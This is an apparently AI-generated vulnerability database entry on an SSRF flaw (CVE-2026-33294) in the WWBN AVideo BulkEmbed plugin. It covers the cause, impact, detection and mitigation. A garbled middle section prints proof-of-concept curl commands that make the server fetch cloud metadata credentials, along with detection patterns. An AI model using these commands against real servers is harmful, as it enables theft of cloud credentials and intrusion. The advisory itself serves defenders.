
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33294 is a Server-Side Request Forgery (SSRF) vulnerability in the BulkEmbed plugin of WWBN AVideo, a self-hosted video platform. The flaw allows authenticated low-privileged users to force the server to fetch arbitrary internal URLs via the thumbnail mechanism, with the full HTTP response body returned to the attacker. All versions of AVideo up to and including 25.0 are affected; version 26.0 contains the fix. The vulnerability was disclosed on March 18, 2026, and carries a CVSS v3.1 score of 5.0 (Moderate) per the GitHub Advisory, with a scope-changed vector (GitHub Advisory, AVideo Security Advisory).
The root cause (CWE-918) is that plugin/BulkEmbed/save.json.php passes the attacker-controlled $_POST['itemsToSave'][x]['thumbs'] value directly to url_get_contents() without invoking the isSSRFSafeURL() guard that protects all six other URL-fetching endpoints in AVideo. The internal url_get_contents() function only calls isValidURLOrPath(), which validates URL format (scheme and host presence) but does not block private IP ranges, localhost, or cloud metadata endpoints such as 169.254.169.254. Critically, this is a full-read SSRF — the HTTP response body is written to disk as the video poster image and served publicly, allowing the attacker to retrieve the response simply by viewing the saved thumbnail. Exploitation requires only a valid authenticated session with BulkEmbed permission (the onlyAdminCanBulkEmbed option defaults to true but is commonly disabled on multi-user platforms) (GitHub Advisory, AVideo Security Advisory).
Successful exploitation enables an authenticated attacker to exfiltrate cloud IAM credentials (AWS, GCP, Azure) from instance metadata services (e.g., http://169.254.169.254/latest/meta-data/iam/security-credentials/), potentially granting access to S3 buckets, databases, and other cloud infrastructure. Beyond credential theft, the attacker can perform internal network reconnaissance by probing private IP ranges and observe which requests return content versus time out, effectively mapping internal topology. Any HTTP-accessible internal service — admin panels, monitoring dashboards, databases with HTTP interfaces — can have its responses exfiltrated through the thumbnail mechanism, crossing security boundaries from the web application into the internal network and cloud infrastructure (GitHub Advisory, AVideo Security Advisory).
A detailed proof-of-concept exploit with step-by-step curl commands is publicly available in the GitHub security advisory, targeting the plugin/BulkEmbed/save.json.php endpoint with cloud metadata URLs (AVideo Security Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.013% (2nd percentile), indicating low near-term exploitation probability (GitHub Advisory). No threat actor attribution has been reported.
onlyAdminCanBulkEmbed setting is disabled (common on multi-user platforms), or obtain an admin-level account.COOKIE=$(curl -s -c - "http://avideo.local/user" \
-d "user=testuser&pass=testpass&redirectUri=/" | grep PHPSESSID | awk '{print $NF}')curl -s -b "PHPSESSID=$COOKIE" \
"http://avideo.local/plugin/BulkEmbed/save.json.php" \
-d "itemsToSave[0][title]=SSRF+Test" \
-d "itemsToSave[0][description]=test" \
-d "itemsToSave[0][duration]=PT1M" \
-d "itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
-d "itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/" \
-d "itemsToSave[0][date]="videos_id or filename of the newly created video entry.curl -s "http://avideo.local/videos/{filename}.jpg"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role} to obtain temporary AWS access keys, secret keys, and session tokens for lateral movement into cloud infrastructure (AVideo Security Advisory).169.254.169.254 (AWS/Azure metadata), metadata.google.internal, or private IP ranges (RFC 1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and localhost/127.0.0.1._error_log) entries matching the pattern thumbs=http://169.254.169.254/... or thumbs=http://10.x.x.x/...; entries showing BulkEmbed: SSRF protection blocked thumbnail URL (post-patch, indicating attempted exploitation)..jpg files in the AVideo videos/ directory whose content is not a valid image but instead contains plaintext (e.g., JSON, HTML, or credential data from internal services)./plugin/BulkEmbed/save.json.php with itemsToSave[0][thumbs] parameters containing internal IP addresses or metadata service URLs; subsequent GET requests to /videos/{filename}.jpg from the same session shortly after the POST (AVideo Security Advisory).Upgrade WWBN AVideo to version 26.0 or later, which adds isSSRFSafeURL() validation before the url_get_contents() call in plugin/BulkEmbed/save.json.php (commit 4589a3a) (AVideo Patch Commit). As an interim workaround, restrict network-level access from the AVideo application server to cloud metadata endpoints (169.254.169.254) and internal IP ranges using host-based firewall rules or cloud security groups. Additionally, enable the onlyAdminCanBulkEmbed option to limit BulkEmbed access to administrators only, and deploy WAF rules to detect and block SSRF attempts targeting metadata endpoints and private IP ranges in POST body parameters (GitHub Advisory).
The vulnerability was reported by a researcher credited as "offset" in the GitHub advisory and published by AVideo maintainer DanielnetoDotCom on March 18, 2026. A technical write-up was published by Infinit Security shortly after disclosure (Infinit Security). The CVE was noted in automated feeds including Bluesky CVE tracking accounts and aggregators such as VulDB and CVEFeed, but no significant broader media coverage or notable researcher commentary beyond the advisory itself has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."